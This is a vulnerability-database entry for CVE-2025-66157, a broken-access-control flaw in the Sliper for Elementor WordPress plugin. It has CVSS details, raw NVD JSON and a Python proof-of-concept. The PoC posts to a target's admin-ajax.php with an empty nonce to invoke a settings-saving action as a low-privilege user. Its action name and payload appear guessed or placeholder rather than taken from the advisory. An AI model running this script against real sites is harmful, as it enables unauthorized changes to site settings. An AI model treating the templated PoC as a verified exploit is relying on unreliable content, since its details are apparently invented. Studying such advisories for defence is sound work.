Security Vulnerability Report
中文
CVE-2025-66157 CVSS 5.4 MEDIUM

CVE-2025-66157

Published: 2025-12-31 17:15:50
Last Modified: 2026-04-23 15:35:29

Description

Missing Authorization vulnerability in merkulove Sliper for Elementor sliper-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Sliper for Elementor: from n/a through <= 1.0.10.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Sliper for Elementor <= 1.0.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66157 PoC - Sliper for Elementor Broken Access Control # Requires authenticated user account (subscriber role or higher) import requests import sys TARGET_URL = "https://target-site.com/wp-admin/admin-ajax.php" COOKIES = { "wordpress_test_cookie": "WP+Cookie+check", "wordpress_logged_in_[hash]": "user_token_here" } HEADERS = { "User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded" } def exploit_sliper_broken_access(): """ Exploit for Missing Authorization vulnerability in Sliper for Elementor plugin This PoC demonstrates how a low-privilege user can access admin functions """ # Example malicious request - accessing protected function without proper authorization payload = { "action": "sliper_save_settings", "sliper_nonce": "", "settings": "malicious_settings_payload" } try: response = requests.post( TARGET_URL, data=payload, cookies=COOKIES, headers=HEADERS, timeout=10 ) print(f"[*] Request sent to {TARGET_URL}") print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text[:500]}") if response.status_code == 200 and "success" in response.text: print("[!] Vulnerability confirmed - access control bypass successful") return True else: print("[*] Response indicates possible protection or patched version") return False except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-66157 - Sliper for Elementor Exploit PoC") print("=" * 60) exploit_sliper_broken_access()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66157", "sourceIdentifier": "[email protected]", "published": "2025-12-31T17:15:49.593", "lastModified": "2026-04-23T15:35:28.980", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in merkulove Sliper for Elementor sliper-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Sliper for Elementor: from n/a through <= 1.0.10."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en merkulove Slider para Elementor permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Slider para Elementor: desde n/a hasta 1.0.10."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/sliper-elementor/vulnerability/wordpress-sliper-for-elementor-plugin-1-0-10-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}